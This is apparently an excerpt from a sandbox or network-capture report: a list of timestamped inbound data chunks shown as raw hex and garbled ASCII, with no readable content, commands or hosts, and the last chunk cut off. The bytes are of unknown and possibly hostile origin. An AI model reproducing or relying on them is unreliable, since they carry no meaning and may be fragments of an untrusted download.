2022-03-22 15:50:26 UTC	938	IN	Data Raw: b5 a4 25 0f dc 58 72 6f 66 03 4b 2b c1 84 34 21 4d ad 8e e9 33 bc 51 d5 70 8d 4c 06 ac 2d e7 94 5a 5b 1e 36 0d fa 74 3b 47 05 81 e3 c1 a3 ae f3 17 d5 d5 f6 db 56 be f9 27 3f b8 13 ac 7e dc 66 28 16 43 04 52 5e a4 f4 77 69 67 de 1d 49 78 09 36 38 a1 99 de 47 13 78 69 ee 0b a1 16 4c 8b 1c cf 53 29 05 e7 8c fe 67 31 a7 d4 76 7e ed 44 b0 1c ff 76 3d 66 eb 0b cb b1 27 c8 32 02 47 aa 85 16 28 7d 40 29 60 29 62 01 fd 3e 9a 79 c7 b1 da cf 79 9b c3 17 73 1d 81 f3 05 12 78 7f f7 7f 69 eb 60 4d 03 f5 d5 d9 5d 1f 51 9e 8a 1c 29 4e 35 3b 79 10 3e ca 64 61 a8 7e 17 d6 3a a7 20 c5 6d b0 f8 41 e1 54 27 b7 e2 30 21 17 83 2b ba 6a 8c 99 1e 92 86 c2 c5 9c 54 f6 d3 51 c5 72 d9 3e 92 46 1d f9 49 d8 48 68 61 a3 ba 72 41 51 dd f6 c9 d2 0e b8 dd fb 50 52 e1 5b 7d e1 42 9b d0 26 Data Ascii: %XrofK+4!M3QpL-Z[6t;GV'?~f(CR^wigIx68GxiLS)g1v~Dv=f'2G(}@)`)b>yysxi`M]Q)N5;y>da~: mAT'0!+jTQr>FIHharAQPR[}B&
2022-03-22 15:50:26 UTC	945	IN	Data Raw: f1 c1 37 fa 05 e2 f4 81 bf bb ce d1 b6 30 43 ec 72 a1 1e 43 06 05 9b 72 c9 7a 6e 3a 09 53 45 64 82 a8 e7 07 d4 a1 59 16 4a 51 60 53 aa a7 76 c7 ed af 1d e2 28 e4 86 e2 d7 59 c2 12 19 13 9c 3d 51 da 78 2f 9f 5c 69 7a c9 9a 74 1c e6 b5 dd 18 26 70 2c 2e af 30 10 77 c5 ed a1 fd 4b 73 07 22 8e ac 1f ee 74 86 14 49 e4 c4 82 6a d8 89 53 5a 4a 56 2f 92 57 60 74 16 a5 33 91 b4 0c f1 bc c6 85 a0 68 ec b8 b1 ec 5a 2e 9d df 23 24 53 fa 36 82 af 27 1b 8a 83 6a 9d e0 6b 8e 7f ad 98 6f 40 e4 30 e7 88 18 26 74 69 e9 47 03 27 86 63 aa d9 56 25 53 6c 11 c2 c6 f5 3b f1 eb 5f 7c 87 f7 b8 26 0a 39 ae ca 80 1e ce 94 93 c5 8b a2 dc 37 a4 1a 25 de 65 b5 86 6d 48 52 c2 14 07 f5 58 18 83 7a 35 e2 59 3c 2d 05 82 71 66 eb ae 33 07 57 be 36 b6 64 b6 ef 6a ce 02 49 6d 9d f7 fa a0 7a Data Ascii: 70CrCrzn:SEdYJQ`Sv(Y=Qx/\izt&p,.0wKs"tIjSZJV/W`t3hZ.#$S6'jko@0&tiG'cV%Sl;_\|&97%emHRXz5Y<-qf3W6djImz
2022-03-22 15:50:26 UTC	953	IN	Data Raw: d3 c3 cc 45 54 e0 fc 29 d9 06 1a 2a 42 db 8b 6b 11 5e a5 69 f2 7a 86 0e 83 12 f0 4d ca 95 0f 4a 91 e6 b6 44 b1 67 53 c0 d6 60 51 e5 bd ee 84 88 0f f7 1c f7 05 c2 85 19 bb a6 f4 1b 24 92 3d 7c a7 9e 9d 52 d4 2d 4a d4 17 01 b5 7d 7f 9c 25 54 9d 41 75 3b 1c fb 03 be d3 3e a9 6c f5 f9 a3 e5 82 96 cb 0d ef f2 3c 84 55 4b 10 dd bf bb e3 fc a9 d1 48 8b e0 e3 00 59 87 c1 e2 d0 90 75 98 29 6e 76 22 2c 31 2c 20 62 28 6a fa 18 5c af cd b3 e1 da 4c 4e e2 84 f3 26 4b 9c ab 8e e6 1c 43 f8 ee 8f 34 3b 05 12 c6 97 30 ba 64 9e 7b 96 0f 39 7f ed 4d 91 9f 4f 58 8f 0d 18 b5 e2 93 e3 c3 5a f3 8a fd 3f e2 b5 ff eb dc ba 18 03 fd cf dd 93 b7 81 7f c0 0e 95 54 f2 bf 81 b9 83 77 e7 82 cf af f1 4b ef 52 8c 9c f0 1e a0 ef 27 3e 2e b9 c2 44 a1 e2 51 8d b8 3b 21 76 d3 56 23 9e 4c 0a Data Ascii: ET)*Bk^izMJDgS`Q$=\|R-J}%TAu;>l<UKHYu)nv",1, b(j\LN&KC4;0d{9MOXZ?TwKR'>.DQ;!vV#L
2022-03-22 15:50:26 UTC	961	IN	Data Raw: 74 98 07 b9 93 85 93 5c f9 b5 f5 1f cf 4f 17 34 26 5a 38 d5 5a 31 e3 ae 45 52 c1 33 2e 92 55 37 cb 34 4b db eb 6f 57 d6 c9 d7 fa 92 51 77 23 e3 fc 04 36 51 b9 f6 6c f5 53 fc 86 da cc 0c b9 74 db a5 fe 3a d2 68 34 b3 df c5 3d a4 8f 47 ef 69 d6 8d 1a a2 c6 16 9d f7 f6 c3 1a 2c bf 76 b1 f9 5d db 78 8f 6a 2c cc f5 d3 8d 3b 6a 4b 88 ab 30 39 84 c5 a8 90 73 db cb 3e 13 3b dc aa 81 6a dd eb 2d a2 09 1d 7a 67 1a e5 4c 59 3b 77 40 95 94 0d 29 dc a4 23 f6 66 28 ab bd 66 b5 b5 de 57 80 6c 0d 90 b3 fe c1 dc ce 77 e1 5a 36 15 75 66 52 9f 94 f5 17 ea 61 28 e2 4b 20 59 05 e0 d2 6d e0 85 9a b1 9b 1f f3 b8 54 5b d9 c4 0f 20 a6 a7 64 cf 8e 0b 31 c7 23 d1 83 c5 eb a5 69 61 a9 59 0a 6c 0f 94 81 2a 9e 19 95 f9 c1 9e 18 a9 99 51 2e b0 07 44 87 30 6c e3 dd ce 81 76 3b c4 d4 d6 Data Ascii: t\O4&Z8Z1ER3.U74KoWQw#6QlSt:h4=Gi,v]xj,;jK09s>;j-zgLY;w@)#f(fWlwZ6ufRa(K YmT[ d1#iaYl*Q.D0lv;
2022-03-22 15:50:26 UTC	969	IN	Data Raw: c5 61 e5 fb b4 69 8d 1e f0 7f dc 3d d8 ae 7b 12 ee 4a c8 24 71 66 6b 59 1f 99 77 56 ca 33 c1 65 52 98 55 82 d8 13 8e 52 9f a0 5a 25 85 c6 7c 79 f7 76 51 0e f4 59 49 38 e4 a3 cb ef 12 3e 44 7b 0e 2f b2 f5 9a 95 f9 7a b9 e3 0b 8b dc 36 e0 79 25 e0 86 b1 af b2 3f e4 c6 37 64 0c 53 39 82 a6 a4 cf d3 4d 26 7e f5 d6 a1 af 92 de de d5 46 3c a3 42 1c 95 26 e5 10 ab a1 e1 28 11 a4 1e 53 cb aa 2c 55 c1 ec 0e 9c fb 19 57 79 5b 63 09 ca bf a2 f8 de 0b 51 9f 26 65 e3 e7 bc df 37 c7 5f a1 79 0d 59 88 d6 df 37 7e fe 1f 20 15 8e 83 bd dc 72 fe d8 32 4c c8 7f 6b 77 56 6e f3 a5 4c 01 30 c7 e0 e5 b6 4c 84 d8 e4 fc da ae 20 d5 ba ca bc f5 d0 86 71 82 8e 3b 1c 55 42 0d e4 64 6a b7 53 ad c1 7c 8e 78 b4 e3 eb 76 1c fa c9 b8 f0 db b9 c8 3b 5a 8b e3 d3 d3 3a ad 8a 59 6a 93 e9 e8 Data Ascii: ai={J$qfkYwV3eRURZ%\|yvQYI8>D{/z6y%?7dS9M&~F<B&(S,UWy[cQ&e7_yY7~ r2LkwVnL0L q;UBdjS\|xv;Z:Yj
2022-03-22 15:50:26 UTC	977	IN	Data Raw: 09 28 0b 2a eb b2 13 ac 75 1f c2 17 af ff f4 42 90 f7 fa 3f 73 a0 fb ed 58 ac 42 37 4a 00 5c 3e f2 a1 cf 8f af 74 65 f5 26 5b 2b 44 e8 a0 92 2a d7 fd ca b9 97 d9 ef fa 7d 8b 12 55 4a 6c a7 1a a7 1c b7 f8 98 1b 51 26 ff b9 cd 09 ed 74 3e d1 1b 06 b5 5c 81 b7 ea e8 ca a0 4b 8f 72 bc ea a9 ca e1 e3 3e cb fc 44 b1 8d 5c e3 ba fb 08 67 85 45 cf e7 36 36 ab 87 3f b2 89 92 9f 91 ff 8d f9 eb ba fe 67 40 29 02 52 bb 7b 74 b8 f9 b0 f7 72 06 22 22 a4 79 59 fd ca 08 b5 03 d7 d2 51 c0 a9 f5 e4 64 18 df a1 68 4e 42 05 c3 0f 39 9b 49 7a 4e 15 d1 41 ba 80 99 6e d3 80 6a 0e 90 de e5 bb a3 89 c4 33 5f 21 df 5b 45 9d 32 68 54 e6 87 49 a6 71 64 a2 b7 a0 74 d7 77 b2 78 be 4e d2 d7 0b 52 44 09 d4 88 25 f6 67 99 47 05 80 7c 0b ea d3 cf 6a a1 5d 25 a6 60 ea cf 67 34 51 64 98 41 Data Ascii: (uB?sXB7J\>te&[+D}UJlQ&t>\Kr>D\gE66?g@)R{tr""yYQdhNB9IzNAnj3_![E2hTIqdtwxNRD%gG\|j]%`g4QdA
2022-03-22 15:50:26 UTC	984	IN	Data Raw: 7c 39 ec e2 93 14 bf 36 cc 0a 1f 21 55 2f 3b bd cb b0 02 1c fb 6e c3 01 7c cc e4 85 8a 8c 4e df 8d 33 a5 22 2a f9 6f 1c 67 6d 18 6d d3 e9 f6 91 bf dc 97 57 3b fc 62 b0 d9 ef 05 83 ea 5e 96 d2 c0 ed 35 9d 2c 9b e7 b1 bd 6f a3 aa bd a2 d7 f2 90 b1 2a 57 b9 35 9f 64 ba 1a 5b 68 fa 7e cc 28 95 01 d0 86 d4 ec f3 cf f8 1d 8d a3 06 66 43 8d 85 b8 af c7 51 9c 5a 14 35 52 6d 9c 39 36 82 78 36 d7 6e 7a 90 24 de 24 94 c9 2d ea 2f 17 bf 9a d5 13 11 8c e1 52 e9 cc e2 8d db 13 d0 b0 18 5c 5c 4b 15 64 2d 41 b3 25 b4 d3 ef 77 9e 6d f4 6f 7d 3f 8d af 64 a1 3a fa 44 78 63 cc 19 7f c5 b8 7c be 36 1c f2 66 93 5d 94 88 a4 16 b3 b5 9a d2 02 08 ed 27 0a c7 c4 5e f2 99 24 1c 56 41 ec 77 6b ce fc b0 f9 8e 3e 24 3b 18 64 2c 0f d7 f8 b6 ba e7 7e 84 36 af ab 72 1f 92 95 c5 b1 33 66 Data Ascii: \|96!U/;n\|N3"ogmmW;b^5,oW5d[h~(fCQZ5Rm96x6nz$$-/R\\Kd-A%wmo}?d:Dxc\|6f]'^$VAwk>$;d,~6r3f
2022-03-22 15:50:26 UTC	992	IN	Data Raw: 27 5e ff f5 f1 ef 48 d4 47 d8 b1 19 23 42 bc 39 00 e6 2c 06 19 40 df 11 a7 7d 04 7b 3c e7 e1 c2 71 f7 0a 49 5a 8f d0 11 29 d8 ef b0 ef f9 b1 60 f1 d9 78 bb 29 a7 b5 39 3b a0 93 bf 54 59 4b 15 df 64 75 bc e9 a5 3a 83 10 55 08 fd 0d 37 d7 52 2d f5 19 63 fb 2d 8c b8 31 51 3b c0 31 a4 d8 95 1f 83 33 42 d9 7b cf 6c 72 db eb d6 9d 57 80 1c df db d4 e3 b3 2b f0 aa db e9 a1 e9 3e dd 4c c6 88 61 1a 66 4b 4b 5e c3 07 70 d3 fc 05 97 9b 72 12 f5 f4 08 7d 76 81 fa 91 73 6e 23 2e 1b b7 f7 21 3f d9 e0 aa 9a 97 65 60 ea 21 d3 b2 51 f9 de c1 c2 e1 f4 87 3d b3 c0 a9 ed 72 63 42 14 99 ce 1a 69 7e 7d e8 0e 16 14 75 77 5c ff d6 1f 95 47 20 f6 b7 c2 1e d5 af 4c 38 a0 2c c7 a7 3d 6b 31 49 71 10 58 86 c7 ee 1a 39 43 de c9 c4 34 45 27 2c 9d 78 70 8b 9f 63 92 da 4d 08 69 55 fb 8e Data Ascii: '^HG#B9,@}{<qIZ)`x)9;TYKdu:U7R-c-1Q;13B{lrW+>LafKK^pr}vsn#.!?e`!Q=rcBi~}uw\G L8,=k1IqX9C4E',xpcMiU
2022-03-22 15:50:26 UTC	1000	IN	Data Raw: 51 45 5d 91 03 77 75 18 4d dc 3f 34 1f 72 1b f3 04 0e 33 19 65 ca f4 69 89 12 d0 2f 90 8a 54 ec 88 89 80 84 91 6c 56 5f 55 cd d9 d4 01 ab 32 b7 0f 08 e4 c9 ca b9 46 0e 0e 59 c4 45 35 0c 15 c1 31 0c 2b 2e 50 6c 01 b8 2f 34 1a 98 2f 52 24 74 6f 51 18 d9 5d c5 ae 41 d3 59 4c 48 04 0b 2e d5 3f 59 12 78 f9 a8 55 18 8e 1d e5 32 df 24 ae be 4f 2d cb c0 c6 80 b5 1e 81 3e 3a 9d 79 16 c5 e2 66 cc 1a c7 63 38 86 05 9b 31 65 a2 26 4c b0 a9 d2 45 08 1e 52 2c b3 39 1b 9b 34 c1 ef f0 4e a6 2a 0d f9 7e 57 21 dd 48 db be b3 f2 3a 3f cb c8 ec 9f ef 63 97 6f 3a fd 99 64 f0 9b a0 eb b0 3c 90 a4 e2 9a 3d 1a 62 34 9b 0c b9 db 3b 72 e0 cd e4 ba 54 ee 54 c2 c9 94 43 0d 26 30 28 25 db d5 d2 12 59 bc cd 2a c7 eb d0 6b 9e bd a4 87 f0 ea 41 9b 1b 32 3c b5 82 d9 ba 8e b6 a3 a0 eb 6e Data Ascii: QE]wuM?4r3ei/TlV_U2FYE51+.Pl/4/R$toQ]AYLH.?YxU2$O->:yfc81e&LER,94N~W!H:?co:d<=b4;rTTC&0(%YkA2<n
2022-03-22 15:50:26 UTC	1008	IN	Data Raw: 71 02 e1 93 46 60 dc 57 1a 00 75 e8 eb fd e6 bc 47 1c e9 24 2e 8b 5f e2 17 41 69 16 44 cb 8f 65 f1 eb 0d 69 a5 be f6 0d 26 0c 36 ed 00 f3 1d 71 e5 a8 00 f8 75 e2 0a 7c e6 53 54 ec 3a ef fb 0c e3 7a 71 f0 00 42 f0 1d 04 6b 51 97 76 f0 30 d6 54 37 52 33 f1 bd d2 f9 80 99 d9 85 e0 83 38 fb f2 d7 3e c5 7b 7b 04 89 3b 18 0a 50 c8 5d ca 4e 1d ae 73 5a d3 25 d4 8f af dc fb 67 70 9b 87 83 d7 30 4b f8 94 b6 66 25 b2 50 55 90 8e 50 37 03 e6 2f cc 2b 54 ef cb 4c 0d c4 bb 2a 89 77 bc bc 7e 6e 8e 0e ee 14 4a 44 22 8a 10 f4 f9 c4 3b a0 d7 42 4f f3 a8 ae b2 48 f9 98 da 89 64 ea 79 e6 81 d5 b3 4a 08 84 42 97 4e 77 06 27 ad 77 80 9e b0 ae bf 2a 20 d0 99 e4 9f 8e 99 f5 f5 f6 86 cf d7 85 c8 dd cd 7a 66 13 81 d9 77 93 e0 f7 86 6e d8 d6 5c df a6 b3 f1 39 d9 90 34 e4 d8 7c a2 Data Ascii: qF`WuG$._AiDei&6qu\|ST:zqBkQv0T7R38>{{;P]NsZ%gp0Kf%PUP7/+TLw~nJD";BOHdyJBNw'w zfwn\94\|
2022-03-22 15:50:26 UTC	1016	IN	Data Raw: 21 92 91 d0 f9 38 d6 14 2e a3 64 77 42 41 67 f8 93 43 e6 3e 82 82 7d 28 44 4f 50 c1 80 b7 84 f5 27 a1 98 85 e9 b7 61 28 d6 96 4f 0a 83 54 92 23 a0 48 20 9d 54 91 8a 77 2b a1 16 a7 fa 8e 62 de 2f b9 7e f0 29 8e 87 3c 0a 95 61 69 5e 43 71 d7 53 c7 9e 0c 53 54 1d 0c 55 ab 2e 43 9d 17 f6 55 c7 43 56 e3 3b 4b b9 42 c4 73 bc 4a 29 13 4b 31 1a 1a cd 8d fa 0c 18 d8 f8 7c 81 c6 1e 42 03 d8 b7 a8 3f 2e f0 84 40 c2 2a b4 94 7f e9 f1 62 3e 11 94 14 18 c5 0c 2a 7f 49 2f 2c 2a e6 1b 84 e0 67 3a 92 84 d5 6d 6d 82 d4 ab 53 e1 f0 ce 8a 25 98 96 b0 23 5a 7e cb 07 c7 60 11 c1 36 f8 6f e7 b8 40 e5 da c5 78 7d b1 04 14 e7 f5 54 27 0d 07 84 d2 cd 99 6c 86 5e 87 d0 be b3 76 11 e9 23 e2 4a 4f 66 3c 55 f4 09 62 fe 0a ab 94 99 a3 bc 28 bc ad 6f f0 c6 e9 0e c4 3d 9d 75 16 38 be e0 Data Ascii: !8.dwBAgC>}(DOP'a(OT#H Tw+b/~)<ai^CqSSTU.CUCV;KBsJ)K1\|B?.@b>I/,*g:mmS%#Z~`6o@x}T'l^v#JOf<Ub(o=u8
2022-03-22 15:50:26 UTC	1023	IN	Data Raw: 75 09 36 da 53 59 07 2a b5 be 14 1a dd ea ca 47 9e b4 cc 9d 5a 64 b1 92 2f 11 c7 57 18 6a b9 4c cb 05 c1 3a 15 5d fe e0 a8 73 e8 5a 20 de 89 8f 47 44 7f e1 42 bd c5 7a 6f ee 89 0f 74 20 de 1c a0 5b de ba f2 aa 4d f8 29 b9 d2 1e 6a 42 e5 36 25 4e b4 9e 3d c4 87 c1 a6 66 bd 62 43 8e 9f 90 d1 14 06 6a 3d 91 36 69 8b d5 18 93 0b bc 24 60 a0 4c 93 2d 2b e8 14 59 9e c5 1a 16 11 4b 16 06 5f 30 5d 52 16 c5 e9 60 70 db d5 c6 40 a8 74 98 9a 0e 87 12 a1 aa 15 8b 7e a7 63 0f a9 76 80 45 07 bb 3e 47 d7 5b ad 6f 60 ea c4 4a b9 56 04 a7 e8 7a 26 5f 5e 0e 95 86 59 94 e0 90 05 37 ef 77 4f 09 8f 71 b9 f7 05 62 b9 c3 9a f8 3e 80 97 0b c8 e0 23 67 4b 67 1a e0 4b 4f 3f 79 e7 98 51 8b c9 9e fb d9 a7 d7 ac 1a 29 04 e7 07 4f d0 16 bf 10 c5 83 a2 8a e4 44 f5 c4 6b 2d 4f 31 0e 46 Data Ascii: u6SY*GZd/WjL:]sZ GDBzot [M)jB6%N=fbCj=6i$`L-+YK_0]R`p@t~cvE>G[o`JVz&_^Y7wOqb>#gKgKO?yQ)ODk-O1F
2022-03-22 15:50:26 UTC	1031	IN	Data Raw: 4d f2 ce eb 12 27 c2 d6 ad 66 e7 5f 7b f5 d4 ed d5 e2 f9 b8 fa 86 35 43 a0 d3 58 74 fd ae 43 4b 78 67 fa 3b 9d 42 f5 d0 80 85 89 51 22 fd 67 de a9 f2 bf 3a 20 40 6e 08 d1 1e 5a 0c 73 3c 44 55 d5 6b 46 73 8f ce 4e ed 64 9b e1 16 cd 6b 10 42 c3 c8 f4 e2 cd 99 d1 6b bc be 14 2e cb 34 71 80 c9 37 a4 35 21 b2 0c ec fa 98 fb 91 44 be d1 5b 69 2e 01 15 53 b7 29 ab 81 f3 b1 35 59 0c 90 16 b3 c6 5e cb eb 27 bc ae 31 d0 4e c8 c0 5d 26 4f 8b b8 b1 f8 33 d8 69 48 d4 ed 06 57 56 3b 42 0f 3c 45 c8 94 37 28 03 4c 04 66 e9 47 b4 2f de 3e 5f 83 d0 b6 46 6a 12 6e 9b e4 d7 2c da f0 4c 10 0f 9d 62 77 d8 1c df ab 3d 9f 73 64 ef 38 cc bb e3 f5 5f 62 53 94 53 a4 7e 22 8f ed 26 f2 42 77 c5 af 98 4e 75 35 e0 65 24 f9 36 be 82 93 c1 fc ba 09 15 11 82 51 21 e4 d8 7d a3 ad 6b 2e 79 Data Ascii: M'f_{5CXtCKxg;BQ"g: @nZs<DUkFsNdkBk.4q75!D[i.S)5Y^'1N]&O3iHWV;B<E7(LfG/>_Fjn,Lbw=sd8_bSS~"&BwNu5e$6Q!}k.y
2022-03-22 15:50:26 UTC	1039	IN	Data Raw: 94 ba 85 75 6a 4e 41 68 37 fc 77 c2 3e 6c 61 a7 30 6f ea 6b 33 b0 11 d9 73 fd de 6e de 85 48 76 9f f0 cc 19 01 ab 11 c6 5f d8 a8 55 23 d5 ee 5a 96 3b f6 e6 59 b0 0c ff d1 3f cd f4 8f 13 e8 e2 ba 7a 98 f3 b6 31 bd 1f 32 e1 61 f6 c6 18 87 67 6f 66 41 54 bf 93 a3 80 cd 24 59 7a bd 13 d7 b9 80 33 62 d0 bb 92 72 04 25 27 b6 79 2b 70 4a 56 1a cd 6d 91 bc e2 b8 90 94 95 f5 65 9f 2b f2 94 0c 1a 4f 61 cc e8 48 9e 3c 65 a0 3b ab b0 a9 50 98 c3 f8 c8 f3 0e ab 2e 3c df 3c 05 19 b2 2e 1a b2 23 af 82 9c 54 fc ee 34 49 38 da 15 fc be e2 d1 df 72 84 15 6f b3 89 6e d4 b9 04 85 ef 05 9d e0 3c 30 d2 98 bf 21 0c 4c 15 8b 73 95 42 1a 86 9d b5 54 a9 11 6b a8 10 58 26 d4 46 a5 97 9e a4 de 71 b6 d5 33 b1 3d e7 c3 a2 ce 20 0c a5 83 a0 b6 63 ab e5 bd 05 89 a4 ea ef df 4f 9f 2f 65 Data Ascii: ujNAh7w>la0ok3snHv_U#Z;Y?z12agofAT$Yz3br%'y+pJVme+OaH<e;P.<<.#T4I8ron<0!LsBTkX&Fq3= cO/e
2022-03-22 15:50:26 UTC	1047	IN	Data Raw: 75 17 b6 36 f2 0f 75 89 e5 48 23 77 84 c7 6a ad e2 b4 b0 e7 ee 06 50 7b c0 d1 b9 78 13 94 45 8b 4a 30 63 a6 23 46 dd eb 78 56 be b1 8d e7 85 04 05 40 dd ab 69 9e 37 84 52 d3 57 5f d7 55 ba 6b 9b 89 09 94 b3 4f f0 10 ff d7 3a 72 fc e2 c1 57 94 cb 6f ce c5 ba 52 6b b2 c4 34 17 b5 fa 74 fd dd 78 6f 5f 9c b2 a9 53 e6 23 7b 5b 8a 55 33 53 f6 60 6f 95 18 17 19 12 83 9a 79 12 30 87 10 53 f3 06 07 76 05 f1 dc 24 5e ed dd ca 5e 55 63 e2 58 4f 1f dd 8a 38 6d 5e 0b 90 07 e2 3c 95 b6 96 72 1e 27 2f fe d6 11 4e 9e dc d0 eb 54 a3 e1 84 29 ac ff 8f 16 27 bb 47 73 a1 af b1 64 ec 16 2f c5 66 e5 4b 03 21 46 65 b5 42 f7 00 04 cc f2 50 10 87 b0 9e 85 9c e1 65 b5 02 64 71 31 dd 43 cb 21 9c b7 1a ba f4 72 38 f1 45 a8 1a 8c 48 7f e5 27 9e 30 96 9b bd 3f 17 c0 07 e0 73 c9 2a 62 Data Ascii: u6uH#wjP{xEJ0c#FxV@i7RW_UkO:rWoRk4txo_S#{[U3S`oy0Sv$^^UcXO8m^<r'/NT)'Gsd/fK!FeBPedq1C!r8EH'0?s*b
2022-03-22 15:50:26 UTC	1055	IN	Data Raw: ba 21 f5 7c 96 06 a0 0d 87 2a 6b 96 09 e3 7e 85 31 74 76 04 6d e9 9e 03 a2 4d 2b b8 88 60 c1 30 e4 7c 7a 8f d2 31 0c 59 53 fc c6 c1 5b db 7c 8b c4 fe db ed 5e 33 b2 3f c6 78 ea 73 b9 4f e5 d5 50 ae 6b e7 19 c7 9d 47 b7 45 a6 a5 e5 9f f4 aa c9 59 2a dd dd 09 69 1b 5c ac 66 80 0e 3c 86 e4 2e b0 63 52 61 1b f1 52 04 2e 4a 34 3c 74 46 e5 eb 12 f7 01 e3 18 b7 d9 d1 de 11 d5 1f f7 e0 55 15 1a af ff ca 24 24 75 af 85 a0 e1 f0 c7 43 63 46 72 f1 59 55 1f 37 c8 48 b1 75 cc e4 34 5c ba b2 9e f5 07 2c 21 f7 27 1d 88 33 e3 a8 a3 37 c2 9e 71 e4 dd f8 c6 a4 31 f7 d0 39 73 e0 dc a4 eb 08 6c ad e3 e0 d6 a3 17 f2 57 5b e2 22 ea f4 c2 cc 70 fa 5a 49 1e 30 af b7 3a 02 a0 a8 cb a3 e6 77 31 b4 cd e5 88 22 d3 2c 8c b4 0d 0c 9c f2 e0 2d d2 e2 05 32 4a 7b e7 94 68 73 a4 eb ac 82 Data Ascii: !\|k~1tvmM+`0\|z1YS[\|^3?xsOPkGEYi\f<.cRaR.J4<tFU$$uCcFrYU7Hu4\,!'37q19slW["pZI0:w1",-2J{hs
2022-03-22 15:50:26 UTC	1063	IN	Data Raw: 4b e2 68 bd a5 84 16 f1 9e fb 50 ea 8d 00 37 c1 5e 76 07 5a 09 8a 36 ef a0 98 08 01 1c 90 48 46 75 8f 7a 64 74 67 bd f8 30 59 8e a2 56 ae 52 57 46 7c 53 58 0b ef 59 9a ec f4 6f b6 d5 a0 a0 4a dd 0d 46 8d 28 2a e8 a6 58 5b 81 b2 27 4a 11 b4 51 3c e5 b7 de 3b 08 45 ef a9 b7 8a 6b 8e e0 b8 8c 6a 9f 3b 21 4e da 98 17 04 54 23 61 bb 27 e0 89 53 26 22 9e 65 ce aa b3 e2 3c 81 b2 84 6c a5 3d 23 65 3a 91 a1 d6 1b 16 cb 71 54 67 95 76 55 0d 15 26 ed c8 64 9e 39 bb 78 15 d1 03 1b 6c d6 59 f2 65 99 e8 2b a6 b3 0c bb 74 bb 69 0f b8 6b 2e 1a 3b 65 e3 d7 d7 c8 5c 45 40 59 63 a1 c3 93 4d 6b bd af 7e 70 bb 0b 43 15 45 d9 71 b4 67 8a 03 76 81 81 f6 64 e9 30 d6 20 b6 cd 6a 97 7f 09 bc 38 4e 97 94 dc 98 e6 ab dc f2 02 8f 7a 51 db 76 84 f5 cb 9f 3b 43 0e 94 ca fa b3 c1 28 98 Data Ascii: KhP7^vZ6HFuzdtg0YVRWF\|SXYoJF(*X['JQ<;Ekj;!NT#a'S&"e<l=#e:qTgvU&d9xlYe+tik.;e\E@YcMk~pCEqgvd0 j8NzQv;C(
2022-03-22 15:50:26 UTC	1070	IN	Data Raw: c4 5a 93 c0 04 58 43 5b e0 fc c0 17 e8 e3 4c d4 44 c6 cc 15 99 ef ea 0a 13 b9 f4 79 de b3 f8 e3 6a 59 94 bd 0e c0 1c c9 5d 51 f4 4b dd c8 ab 5c 91 3f 4f 35 35 d3 94 55 e5 5c 67 0d 7b 95 b4 0f 03 61 3e ee c8 40 db 86 81 ce 0f ce 61 c6 30 76 0e bb a0 45 b8 13 6d e5 7c 88 43 58 3a f4 ba c3 da 66 b3 c1 2d 2e 4e 39 24 8b 9c 54 d1 8b ac 58 59 94 b8 89 bb 89 7b 44 4a d0 7a a5 5b 4b 75 3c 21 5d 64 29 54 55 d7 6f 1d 10 b6 15 11 dd 85 41 6f 42 d1 c7 66 4b dc e3 15 7b d9 92 80 f2 12 28 c0 4b 65 b4 21 5d bc fe 8a e3 b8 c4 fd 9c 54 0f c1 df 06 58 47 7f a6 88 61 55 d8 72 27 ec 3d e2 14 14 40 95 5a bb 8a 96 2d 92 a7 38 fa a2 57 8f 0e 55 6b a1 58 65 fe 37 bf 93 55 b5 61 a0 da 79 bb 87 85 dc 1b 6e e3 83 87 d7 b8 31 0c d5 78 17 54 36 79 11 a8 0a 88 e3 dc 8e 07 8e fc d7 52 Data Ascii: ZXC[LDyjY]QK\?O55U\g{a>@a0vEm\|CX:f-.N9$TXY{DJz[Ku<!]d)TUoAoBfK{(Ke!]TXGaUr'=@Z-8WUkXe7Uayn1xT6yR
2022-03-22 15:50:26 UTC	1078	IN	Data Raw: 5f f3 ec 56 4b 32 a7 e1 d9 e7 ea 12 fe ee bf 7b be f1 90 c0 25 b3 84 3c f2 d4 55 ec a1 de 91 cb ae 90 07 91 12 08 34 3a 7b 41 f6 63 a8 42 72 0c 26 90 1a 78 6a bb 4b e4 7b d4 a5 a9 c0 38 26 5f 78 57 6f bb 00 69 cd a4 7e 71 6a 7f 3b 22 b0 9d b6 30 73 cc 2e 27 62 0f 2c fc 9f 98 a0 50 43 86 c8 f2 61 fb 7f d3 ef 87 b1 df 17 1d 73 f3 cf 2c 90 cd 98 0b e0 6f 66 ae e0 c1 55 55 0a f6 06 c2 a3 34 cb 83 b5 6a 3c 88 3c 2d 81 e2 c9 2e 7e 1f c1 ff 6a 4d 85 82 73 c9 20 77 0c f0 f9 dc e9 8f 63 38 e1 40 bf 41 1c ee d8 ac fe 19 10 a1 e1 9e c9 46 e6 c6 3f fb e6 e5 c2 56 11 d2 9d d6 2a be a4 0f 97 e6 62 72 30 2a 96 be de 1c 81 02 f1 22 94 13 5c 94 7c 29 a4 86 67 5a 43 c4 8c 69 5f e4 85 ed 41 50 e4 5b 44 aa 16 04 5c 1a 04 6e 3f 72 4e 8b c8 f9 30 ff 72 63 1e 17 33 a5 2b b8 56 Data Ascii: _VK2{%<U4:{AcBr&xjK{8&_xWoi~qj;"0s.'b,PCas,ofUU4j<<-.~jMs wc8@AF?Vbr0"\\|)gZCi_AP[D\n?rN0rc3+V
2022-03-22 15:50:26 UTC	1086	IN	Data Raw: 7e 66 3c 7d db 27 21 46 09 33 08 21 8e 88 01 a2 34 43 bc 9a 7c 05 fa c0 c8 db 03 c4 2f 3f a6 5c 0f 4a 6c f8 b3 8f 6f e8 8a 75 1d fa 4b ec 1d 43 ef 03 8e 9d 62 e0 6d 56 2a c8 07 37 49 ca 45 0e d7 21 c6 56 d1 08 ae 74 af 0c 88 da f9 2d ae 16 39 a8 6e bc 48 8d 89 16 8b 20 a2 ba 61 e7 58 5f a9 6e 3a 16 0d d8 fd 77 d0 10 40 9e 9e 63 16 06 8a 8f 52 af ac 68 fd 89 36 6d 36 c5 6c a5 e1 5c bf 78 bc 20 27 dd 3c e3 f4 ab 49 bf a0 7b 65 b6 60 7a 1a 89 8d 0b fe ec 3c 89 45 30 a0 de c0 00 35 ad 76 bf 46 68 a1 83 b1 9d aa f8 41 76 b0 6b a7 1a 4a 19 f9 4c 05 12 1b a3 ea 5b 6b 9e f1 db d2 3d 7e f5 76 3a 3c 28 29 6a 06 6b fd c2 de 2c f6 d5 25 ef 5e 60 70 a9 ba 2b 6e 30 0f 4d 3f 83 5f 36 de 0f 87 83 ac df bd 77 b6 6a ec 50 43 65 d8 ed 2c 13 ae 03 